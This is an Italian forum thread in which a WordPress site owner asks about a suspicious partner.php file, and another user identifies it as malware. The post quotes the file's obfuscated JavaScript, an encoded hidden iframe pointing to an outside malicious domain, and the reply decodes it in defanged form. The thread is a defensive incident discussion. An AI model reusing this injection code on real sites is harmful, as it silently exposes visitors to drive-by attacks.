- Home
- Categorie
- Gaming, Hardware e Software
- Sicurezza Informatica & Privacy
- partner.php sul server virus?
-
partner.php sul server virus?
Chiedo a voi esperti.
Stamani ho trovato un file chiamato partner.php nella root del mio sito sviluppato con wordpress.
Sapete di cosa si tratta?
Questo è il contenuto:<script language="javascript"><!-- document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%6E%74%65%72%7A%32%30%31%2E%65%75%2F%73%69%74%65%68%6F%6D%65%2F%79%6D%6A%6C%62%7A%69%6F%68%71%68%74%62%71%62%6E%2E%70%68%70%3F%6E%3D%70%61%67%65%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E")); //--></script> <center> Ведутся технические работы на сервере.</center>
-
Virus? No.
Ma malware sì.Il contenuto dell'escape è questo iframe:
<iframe src="hxxp://wenterz201.eu/sitehome/ymjlbziohqhtbqbn.php?n=page" width=0 height=0 style="display:none"></iframe>Ho sostituito tt con xx.
-
Grazie SeoDart
per la celere risposta
Adesso devo capire da dove è entrato.
Ti è mai successo niente del genere?
per me è la prima volta
-
@Izzyweb said:
Stamani ho trovato un file chiamato partner.php nella root del mio sito sviluppato con wordpress.
WP è aggiornato? Idem per i plugin.
-
Si si tutto aggiornato alle ultime versioni... ma forse ho trovato il problema.
Sul forum del plugin di ALO-newsletter, che uso io, hanno trovato una vunnerabilità, risolta con l'ultimo aggiornamento di due giorni fà.Speriamo sia stato quello
Grazie
-
@Izzyweb said:
Sul forum del plugin di ALO-newsletter, che uso io, hanno trovato una vunnerabilità, risolta con l'ultimo aggiornamento di due giorni fà.
... ok!
